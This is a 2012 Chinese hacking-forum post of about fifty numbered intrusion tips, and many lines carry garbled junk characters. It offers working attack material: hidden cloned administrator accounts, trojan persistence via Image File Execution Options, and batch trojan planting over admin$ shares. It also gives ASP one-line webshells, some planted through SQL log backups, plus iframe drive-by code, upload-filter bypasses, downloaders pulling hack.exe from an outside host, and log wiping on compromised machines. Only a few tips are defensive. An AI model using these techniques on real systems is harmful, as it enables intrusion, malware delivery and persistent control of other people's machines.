找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1911|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,  p) w( m8 }$ ^( _) w. H& Y" u
cacls C:\windows\system32 /G hqw20:R
; E# g4 P" ?* z& m思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, l" I3 r8 y. M+ c恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F5 B9 S0 S; X% T: q7 ~
4 G  m" s' i4 A6 B, ^; E& d/ A
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 A  `& o; S7 a2 e- {2 A. j; G. p+ M: J4 Z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
. d3 K' s" ?7 n, U& s7 g0 ~$ v4 _2 ]0 g$ `. |, G" C
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号% v$ b3 f' p; i1 _/ \5 k

! q+ m% n5 H# i( F% n1 [! t5、利用INF文件来修改注册表/ s. Z: `$ o; n: v; `# Y3 u
[Version]
% b8 m" s& w" j0 kSignature="$CHICAGO$"+ N4 W1 J) |6 m) S
[Defaultinstall]
. H7 x0 h& J6 x# h$ DaddREG=Ating5 V( |' ]# h+ P' E0 n, c
[Ating]
" O: R3 F, }' X: j$ qHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* c* g) U  k& R% [$ b9 ~' R* l4 }9 l' E以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
9 _/ F6 K5 |9 p4 l) n- P9 erundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径6 n- s& G# u8 G0 ]
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 K8 Y2 a5 l: k7 y) t1 Q
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
, s7 p& c) Z0 n4 b: rHKEY_CURRENT_CONFIG 简写为 HKCC
9 H- M$ w" Q: r- K1 O7 o% S8 t0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值: Z7 T4 [9 }+ W# m3 u0 \
"1"这里代表是写入或删除注册表键值中的具体数据6 D9 E7 y/ M( N# z5 E" d

! M  w, W! q3 w* G9 L6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
/ s) F4 D+ m. I3 j1 B7 n3 s' I& Y多了一步就是在防火墙里添加个端口,然后导出其键值: n7 j& `. e; H- F- S
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]! y& S2 ^6 W$ [5 B
3 ]  l. Y7 t7 M0 c9 F
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽, i% ^' [! ~1 E% o. N5 \# W, J! \
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
4 `! U; T. s5 }
6 A/ t5 R: \+ \' J: \4 z; {3 p3 ~8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。2 J4 e. K/ f0 |) X' D7 e

; q3 w! Y" b$ L3 }5 T9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
& _/ M# ~7 e2 x, U可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
  z6 H4 K8 B; q3 O' O) _% y3 k/ h$ ]: z) p/ H( i7 `# M
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; G. y$ l0 c  {& G

$ S, z' {! M# @' L; s11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,3 s# l- O2 t- u( ?8 ^
用法:xsniff –pass –hide –log pass.txt! Y' s2 [! `. `) @7 Y& O+ l
  O4 ^. L( l9 |6 A. p' q( ]9 m
12、google搜索的艺术
: k1 D% Z- \: q5 h搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”3 d' h+ i2 y# m
或“字符串的语法错误”可以找到很多sql注入漏洞。
! N3 h) z- v, p# A5 d! @5 T9 p: _" p) E
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。% i" c" c1 o0 B

. e3 K. c' [) L: d% t. t3 N5 N; A14、cmd中输入 nc –vv –l –p 1987
3 x* j) f, @+ d7 A做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- e" z- g! e3 z  Z9 n
6 E% l- G, ?. j6 b+ {15、制作T++木马,先写个ating.hta文件,内容为6 u" J1 I) E* M
<script language="VBScript">
9 ^9 T; d& ]$ n; _4 D" o$ M- [- Lset wshshell=createobject ("wscript.shell" )
: w+ Y# d" q4 z5 L. M4 B# C+ sa=wshshell.run("你马的名称",1); y- f) g  m. ?7 M
window.close
' a. B; v5 q+ W4 P0 e" H</script>) ]$ {# ~* T" f$ {0 q( s3 J. S: x
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
9 W# G/ G2 R" l3 h
. \" [" Y, f. k4 O+ z16、搜索栏里输入
! g7 S# ^5 R3 S$ W( x关键字%'and 1=1 and '%'='5 x" ^$ F; T$ e# {1 t& u% U4 @8 F
关键字%'and 1=2 and '%'='! H9 e, [0 Q" E1 G1 k% a
比较不同处 可以作为注入的特征字符8 J; g+ h8 A3 F5 k( C  \- G
0 m& \- ?! [/ \* ~' L0 Y. A8 i
17、挂马代码<html>
! X: O5 x  s5 ~; y5 e# G' _6 X<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>/ ?+ M* U0 w8 s1 B
</html>
2 @- I! _# a' {4 j$ l( _' p3 M" O3 J( ?! H  G
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,# i& e3 O: n& m: {: F- E, b
net localgroup administrators还是可以看出Guest是管理员来。$ u* K  L. p* R( m) _% b

! \( r& `2 X9 F' a1 n19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 q2 @7 N+ v; t2 _$ V8 i0 J用法: 安装: instsrv.exe 服务名称 路径
* V, `+ U7 b. D. z0 R7 }卸载: instsrv.exe 服务名称 REMOVE
2 R) H; o3 G2 t" w3 i
5 ~( `2 `" C2 x: ~0 v+ ]0 l9 L
' ~" U$ O) `. M5 `, D% c2 X3 Y21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉2 L* ?* N4 V% a2 W' E$ b
不能注入时要第一时间想到%5c暴库。
& g: Z  d* |2 I' Y% x
& ]4 M& \" O8 v. P$ E# S" E22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
% M* z/ e4 [9 ~! ]# i4 ?0 T6 n* T$ D/ d
3 d& a4 m5 m8 ^% @, U5 y( t) n23、缺少xp_cmdshell时
9 v4 T! @9 Q& G% C尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 l+ T9 X! _# ]) _. K假如恢复不成功,可以尝试直接加用户(针对开3389的), b+ ~1 R- U+ U* B
declare @o int
0 M2 E3 K7 \7 v" _2 ^exec sp_oacreate 'wscript.shell',@o out
& A: `$ }# j9 C! }6 {% W2 w6 dexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员( R9 S$ h7 U4 c9 o8 T6 R' P' |

( f7 [* I( z; U6 J9 J3 h: |24.批量种植木马.bat& q6 r2 c8 k, [& x- d; @& N
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
/ Y5 @/ ^+ l2 K: ]& q: afor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间  x& \6 y) W! _8 p3 s7 @
扫描地址.txt里每个主机名一行 用\\开头
8 U, Y% r6 f' r8 s- S( `9 U/ {
0 J& o7 w% @# G; u; H! H25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
1 h, [; V) K3 I5 i! A) E6 e7 c9 E/ L0 O3 G" H! e5 K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.0 f0 `3 N' f" w7 h. t
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.9 m; O4 t) h7 R
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
8 p' W9 B; t. I7 s( s9 X0 B; I
4 T" i9 ~2 G! u, `: O: [, M27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP) c; A3 X7 K# o6 \( @6 n9 ~
然后用#clear logg和#clear line vty *删除日志8 Y5 s* |) B5 C
+ L1 x- Y7 O0 R  ~/ m* L# a0 o
28、电脑坏了省去重新安装系统的方法& I. @+ u6 }. e1 P8 N
纯dos下执行,' ~& {. _& A3 a, @* |
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config+ q. G2 k: ?, }$ x! _. V
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config- x2 l/ x+ o  O! `& w5 \

1 O) V' |" a: _/ v5 D: n$ v29、解决TCP/IP筛选 在注册表里有三处,分别是:
. Q4 |8 g. N- Z& a! KHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip2 q% L' x+ i( N) Q% |; L
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) L* U6 z+ T+ L5 D5 aHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 Z& N) g! ]8 n分别用
6 X! n1 i/ m3 d* g) Z% p3 Gregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, A# G! H6 U+ Y( \. N7 K; H$ l
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
& i8 Y  _  \; G% E' e' ?4 @regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# B* Q0 S1 @, n$ o9 m3 ?命令来导出注册表项
) c7 P1 G4 @) g  f) t  l9 {% M然后把三个文件里的EnableSecurityFilters"=dword:00000001,
: p- X& ?6 |" H) t6 K& w改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用1 j( x- |' X7 f
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
( \0 k2 Z7 H% {/ [+ g5 x& Q! D' P) J+ ^& u: }
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
& r! q3 B  N$ y7 Z* j1 @SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的36 ], Q  \- U5 ]
; z" B: R1 ]% H/ Q
31、全手工打造开3389工具
2 |- Q) M. V* f. ]打开记事本,编辑内容如下:  `; p* K4 S& U6 }0 k6 X. N5 g
echo [Components] > c:\sql! F: W% q/ U- i4 q* T
echo TSEnable = on >> c:\sql
1 `( Z+ t& s! S* n, t* w; p, L% Jsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
/ X$ e  Q+ {: k" ^/ b/ K编辑好后存为BAT文件,上传至肉鸡,执行
0 G; }; H$ j9 c( e& k8 L0 l% n# r. Q9 `
3 G& F# y9 q1 i4 d( z32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
+ F% s1 a) }9 `" z2 x; ~4 R* O) Z  d: ~
33、让服务器重启# i  h& I; U/ ~5 ^8 h9 e9 t
写个bat死循环:
  {. }7 A  ]) H: n% v@echo off' o. `- ?& b$ j- o0 R. Z" t' T
:loop12 b' n  }4 B  O6 D
cls
# K$ g* K4 J; [start cmd.exe" p5 I" k/ K" {  y' |$ P2 o) B
goto loop1  m; u" A" t" A0 B, y8 A0 s
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启) L5 n( P9 u$ _0 {
$ R0 i) Y- h) {# O
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,/ M% Y; v+ g. ^
@echo off# @  J4 s3 U/ F7 Z3 {6 q
date /t >c:/3389.txt2 |2 i3 i1 c4 ?- A9 ?: ]$ U
time /t >>c:/3389.txt0 x5 @+ C( p& [' Q: g$ e8 e8 ~( r7 r
attrib +s +h c:/3389.bat1 y" e% S/ m8 a7 G- l% D9 c: j
attrib +s +h c:/3389.txt
* X5 R- R% f4 F. l  Cnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt) k; \% ?# b2 T0 P3 g% l
并保存为3389.bat
! P% b  D7 ]$ ?8 x打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
" }+ B5 G: ]3 g
9 ~9 R) K5 J' y35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 l2 b, Q5 r# Q% d& y" u
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
: }$ C# Z) Z3 r2 L9 d输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 l" O! p+ M1 c# L/ R2 K

( A6 v. T( d% Q) U2 I36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件$ D  ~# v4 c* u$ {- _3 J% B9 H, I
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
1 Q4 r+ a' |3 x/ {, p. Recho 你的FTP账号 >>c:\1.bat //输入账号
1 {/ u/ v" j( K# Mecho 你的FTP密码 >>c:\1.bat //输入密码
- l# k  Y" T1 {echo bin >>c:\1.bat //登入" ~6 p) }+ W* o$ J; E( I7 r% Y
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么7 v+ o$ g" k- }) H' p' A/ r4 d: s
echo bye >>c:\1.bat //退出4 P9 Z4 `7 K7 X& x1 l: b! h
然后执行ftp -s:c:\1.bat即可! n- F3 \! N9 z6 l- ^8 u
/ @, y- x2 i5 }1 s7 `/ j6 Q* k
37、修改注册表开3389两法, X$ d# n( r& n3 A% r9 h$ d$ U
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表7 H. i& ~; E8 Q) h4 z
echo Windows Registry Editor Version 5.00 >>3389.reg: l! D7 m) w4 J/ H) L- }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg  Y# v" ^5 Z* W5 [& X  K) X: ?. ?9 Z
echo "Enabled"="0" >>3389.reg- @: f4 ~) T2 o  a. l8 \3 t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows9 G) O' j) K  H. a0 q* K
NT\CurrentVersion\Winlogon] >>3389.reg1 k+ h2 u; K9 e- e; w5 e  `% T
echo "ShutdownWithoutLogon"="0" >>3389.reg/ A8 F) G1 c! R8 g$ i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]+ z( I( A. }1 @5 O* b8 w
>>3389.reg
, w, s8 T3 k0 O9 H5 l+ E4 {# ]: oecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
1 t9 ~9 g9 I! @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 A" B; x( ^( i& r( l$ y+ N>>3389.reg
$ d9 n! {: g/ E. o3 F. M1 Zecho "TSEnabled"=dword:00000001 >>3389.reg
/ Y; B. g1 ]2 R: D0 l% Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 x  z# Z, D# L) {  q& n  O
echo "Start"=dword:00000002 >>3389.reg! y3 T& H/ o; N# Q/ \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 c% V2 j6 i0 t# G
>>3389.reg
0 J+ c$ \+ e# z, x( W6 T1 `echo "Start"=dword:00000002 >>3389.reg  _' n6 M6 n$ H+ m$ s- T  C
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg5 o" k* T5 F" ^8 r- ]8 `) c( W
echo "Hotkey"="1" >>3389.reg
% v0 S; a4 k6 {+ G# qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 c. N3 t! G+ `" D# @Server\Wds\rdpwd\Tds\tcp] >>3389.reg
; f: `) `& l' z8 G# \echo "PortNumber"=dword:00000D3D >>3389.reg
0 E& [  g5 a% D* e, L; d, v- [6 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! W$ `- |7 ^2 @- S
Server\WinStations\RDP-Tcp] >>3389.reg
% w! \9 B+ g/ P1 Q4 @3 ]echo "PortNumber"=dword:00000D3D >>3389.reg' b( _) _! q1 _: Y6 P1 t. G* B# M- M
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。) P/ J$ a+ @$ B7 }2 T& b" [& Y# j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
) h8 I- t  L# ]- s/ I# \+ c4 y因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
6 y$ c: D" b$ h1 U0 G4 Y(2)winxp和win2003终端开启
! W. @9 M8 m: q, s1 B" I用以下ECHO代码写一个REG文件:( D4 N9 ^. V/ S3 y( X" e7 V
echo Windows Registry Editor Version 5.00>>3389.reg
/ F: N0 I1 e: u& Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* q  }; q' e( e/ O' `2 K/ w
Server]>>3389.reg4 i4 d9 i( V8 n3 F# n, |- R
echo "fDenyTSConnections"=dword:00000000>>3389.reg
. ?2 v0 x* @  l: v  {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 x- r8 @" }. x+ `  _Server\Wds\rdpwd\Tds\tcp]>>3389.reg
0 E8 p! N5 g+ L( D( H& Xecho "PortNumber"=dword:00000d3d>>3389.reg, ^2 H, v: n" |9 C0 |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 j/ K6 i* b3 Q1 C
Server\WinStations\RDP-Tcp]>>3389.reg
4 i! G5 F1 @: Y  X* A6 O/ Qecho "PortNumber"=dword:00000d3d>>3389.reg
; l5 j6 r! }7 J然后regedit /s 3389.reg del 3389.reg
. Q0 y, w1 O6 S) R. |4 NXP下不论开终端还是改终端端口都不需重启
  g  w# @0 o( v& C1 e# P, D% B" v1 o. [8 x* T
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃! K4 H- ^; p2 K
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
7 P! |# l! K1 I& i+ @# [- f2 {+ Q/ M: L& S  z% h( ]
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- y  n! u$ b0 q  S9 b' k7 t% V$ G: @/ U
(1)数据库文件名应复杂并要有特殊字符4 w; f4 @( v' j  G, b8 N  i
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
5 `# V' q! g9 M; k将conn.asp文档中的
% n& s# u( B) J5 @& l& l; s) `DBPath = Server.MapPath("数据库.mdb")( H7 ~6 Z6 U# p# f
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. b; V- `5 h3 [

! S. T& k4 o, u  v修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 a: [' x  Q- h5 O' |: m/ H' p(3)不放在WEB目录里* u$ e+ j$ S1 }2 T. }# m( q9 s: @( b& N7 j

9 P* C" d, O' u" W/ q6 a: v40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
- ~, [& `6 ?/ {0 g9 q9 l可以写两个bat文件9 Q9 g! M9 ?2 I& J3 }
@echo off: h. z1 m6 z4 b' o; i; G
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
8 i' S# o' x( D% y@del c:\winnt\system32\query.exe6 P6 R/ [4 [, ^% z
@del %SYSTEMROOT%\system32\dllcache\query.exe
7 \9 Z% {$ i) F) [3 E- S@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
- \; H! q( f( v) Q& c6 S5 M- m; F; u, z0 E, [+ x
@echo off
1 S* \/ D0 m! B. H' l% R@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe/ M& [: s( ^% y0 ]  A' V/ U- Q+ V4 y5 b
@del c:\winnt\system32\tsadmin.exe! |  m2 G8 q, d, u1 Z4 h
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex% S' W  d* E+ i6 \
7 R2 i) |8 k( }& @; X: B9 {) @
41、映射对方盘符' l- `8 }9 {- }1 p) g0 y
telnet到他的机器上,  A+ j2 @9 W1 p+ ~- c7 D$ S
net share 查看有没有默认共享 如果没有,那么就接着运行
3 V9 i4 k9 Q* N  L  |- Pnet share c$=c:  Y% U8 C" S% g+ ^6 W
net share现在有c$
$ F; O1 M. g1 J  B在自己的机器上运行
& ^/ H7 Y! d5 E; jnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ u7 Z; }& t- K8 I2 }
& `; `3 x  U/ J, _4 Z$ W' M42、一些很有用的老知识
2 t& t4 i$ k3 Gtype c:\boot.ini ( 查看系统版本 )4 p' P6 L4 N" i# g, V4 }
net start (查看已经启动的服务)+ G) b* O" _$ p( Q5 V% i& R9 O6 h
query user ( 查看当前终端连接 )
$ ]- }7 V- y& {* L5 _1 D' Fnet user ( 查看当前用户 )
* o; L5 c' K+ w+ Y2 ^net user 用户 密码/add ( 建立账号 )6 a7 Y/ }2 X) L. C: u. s: a
net localgroup administrators 用户 /add (提升某用户为管理员)4 k$ @1 a3 n- W2 K
ipconfig -all ( 查看IP什么的 )
4 b* B" k0 A. Znetstat -an ( 查看当前网络状态 )& m1 v; A. h# s9 A, ?
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
* q' X1 b/ |2 L! d. @# {克隆时Administrator对应1F4. m) \1 K0 a& y3 a( [
guest对应1F5* y* u/ h* G7 J# ^- Y
tsinternetuser对应3E8
9 K( ?! p, S& d9 z4 _7 o9 r3 k  g% M1 X# @( X& a
43、如果对方没开3389,但是装了Remote Administrator Service' L$ u9 _) K- }1 N9 U& Z
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
& e3 F# Q& ~, O3 g) ]! [解释:用serv-u漏洞导入自己配制好的radmin的注册表信息) [4 N# c! D& y2 Z
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"6 }9 x' e. L( E) _) `) t3 e5 _2 H$ W; H
9 R( w; \7 e0 Q* \
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 K- x* q3 H- E! V本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
0 Z6 i* Y/ x# Q) U1 u* _$ f# \  Z
/ \3 E) o- Q; H" a45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
! U- L9 Q7 Q8 [" kecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
9 w! I+ w' }# m; F& [/ _8 k9 i4 ]* |^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 q: a: R; E4 I" t- C
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =6 @% F5 T$ A8 L8 r3 d
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs( v: M6 P' z% X' Q% J
(这是完整的一句话,其中没有换行符)7 \( u  Q9 _& X1 z
然后下载:- x! @$ j! {" _. v  b  U
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
3 l0 g$ [3 ], n# F
) c/ p! R) V4 z" @0 x46、一句话木马成功依赖于两个条件:9 V  ^+ |5 N# M6 Q1 t
1、服务端没有禁止adodb.Stream或FSO组件: {; t6 u" K6 W9 L+ B
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
; D( t: w+ c+ t7 N6 o$ @* H0 f/ ?
47、利用DB_OWNER权限进行手工备份一句话木马的代码:; T7 g: w, S( x, \1 q" T# ?0 Y+ ]; y
;alter database utsz set RECOVERY FULL--* \% t& C' P, ~6 p
;create table cmd (a image)--, Y6 E+ q% w, D
;backup log utsz to disk = 'D:\cmd' with init--
6 k8 F  v( _- L) A;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. r) T3 h8 P- y9 ]' ^. x
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--) C* i" [& n2 `1 G1 o# s
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ }9 R: ^' C( a
! F$ I8 \, M7 L/ {" C8 f- _8 ^48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:# @8 w6 q+ k9 g0 {7 g

# Q+ M8 _/ g% r用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
* g$ {9 j+ D# W) {1 o所有会话用 'all'。
; l! v$ ~  y3 j. E-s sessionid 列出会话的信息。: y6 [8 p( V2 p
-k sessionid 终止会话。! P% ?1 k& U  Y& q
-m sessionid 发送消息到会话。
. l9 A4 r- J5 x2 d
9 n4 z+ W5 M8 sconfig 配置 telnet 服务器参数。+ J0 L' `7 X" I. [9 v
7 r/ ~, ?2 N  s- }1 c  h  R
common_options 为:
% o2 O' F( \, b% J-u user 指定要使用其凭据的用户
0 U- f2 K) F+ W-p password 用户密码( P3 R. W, x' l

. W- w. ]7 A1 \) x! p2 S* z. e' c0 @config_options 为:
2 s! N1 X: E. Q  l1 ~0 @dom = domain 设定用户的默认域
6 h3 ?- I6 A/ t# pctrlakeymap = yes|no 设定 ALT 键的映射
' K$ E. ~1 K5 @7 r+ M! N! Ctimeout = hh:mm:ss 设定空闲会话超时值
2 L( V; }; D" O. Vtimeoutactive = yes|no 启用空闲会话。
: {" Q6 H6 O+ N0 d" i0 ?  K$ O; zmaxfail = attempts 设定断开前失败的登录企图数。; ~9 M3 k/ V3 ]/ j2 Z  ^8 m
maxconn = connections 设定最大连接数。
+ R8 \- @5 k/ ]& [port = number 设定 telnet 端口。
1 g% a) I9 ?/ T+ J0 X( [: j$ H3 Zsec = [+/-]NTLM [+/-]passwd
+ k$ x0 j0 {* n0 s* i) u设定身份验证机构
* d, @5 w9 P0 K1 sfname = file 指定审计文件名。
" f- `) D1 ^; Hfsize = size 指定审计文件的最大尺寸(MB)。) c+ Y' J. R3 W2 \( I- f& P; {  `
mode = console|stream 指定操作模式。
% c3 Q1 y8 y: d8 b% X# ~auditlocation = eventlog|file|both/ L3 e- U- X7 z( m* Q% E& [  J
指定记录地点. E3 d' `+ g+ I/ F+ \6 r; f# e
audit = [+/-]user [+/-]fail [+/-]admin7 N2 B" y7 R: J, f4 I
% l2 k& K. |1 I2 [% D; B
49、例如:在IE上访问:
- `4 L1 L* a: c6 l7 R" Lwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
5 p2 u, e# {5 nhack.txt里面的代码是:
# {3 d$ s" T2 Q3 o<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, A" h" a2 H$ D, i把这个hack.txt发到你空间就可以了!. S1 i. O: y& ~+ c5 b
这个可以利用来做网马哦!
* B5 h! \/ e0 ~* {$ x/ F0 w. h
! d/ l. l- v' ~$ T/ p, L+ {% L50、autorun的病毒可以通过手动限制!* q3 T7 [! n+ v4 J( q- j+ F
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!; E* Z/ q' X( \+ \
2,打开盘符用右键打开!切忌双击盘符~
+ l7 Y( t) \! d) G$ A3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!9 P% w" n7 |6 {- x+ V7 ~
, q1 Z1 u5 f2 D+ c
51、log备份时的一句话木马:
8 g) ?, X4 {: Q  S/ o: Q- ^a).<%%25Execute(request("go"))%%25>( E; N3 W% @1 o* E# _5 x7 N
b).<%Execute(request("go"))%>9 Y4 g) T# r: ]! b7 r8 Z( Z
c).%><%execute request("go")%><%" ?: G2 z9 u! G4 P- r0 k& A
